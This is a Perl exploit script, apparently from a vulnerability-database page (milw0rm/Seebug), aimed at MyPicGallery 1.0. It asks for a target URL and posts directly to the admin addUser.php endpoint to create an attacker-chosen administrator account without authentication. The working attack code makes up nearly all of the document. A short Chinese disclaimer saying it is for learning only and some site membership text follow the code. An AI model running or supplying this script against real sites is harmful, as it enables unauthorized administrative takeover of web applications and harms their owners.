#!/usr/bin/perl use strict; use LWP::UserAgent; print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n"; print "-+-- Discovered && Coded By: t0pP8uZz --+-\n"; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n"; print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n"; print "\nEnter URL(http://site.com): "; chomp(my $url=<STDIN>); print "\nEnter Username(create's a admin username): "; chomp(my $usr=<STDIN>); print "\nEnter Password(create's a admin password): "; chomp(my $pwd=<STDIN>); my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" ); my $ob = $ua->post( $url."/admin/addUser.php?userID=admin", { "submit" => 1, # ugly? "fullName" => "null", "userName" => $usr, "password" => $pwd, "conPassword" => $pwd, "uType" => "admin", "email" => "null\@null.com" } ); if($ob->is_success && index($ob->content, "added") != -1) { print "\nAdmin Account Added! Login at: ".$url."\n"; } else { print "\nExploit Failed! username already exists?"; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论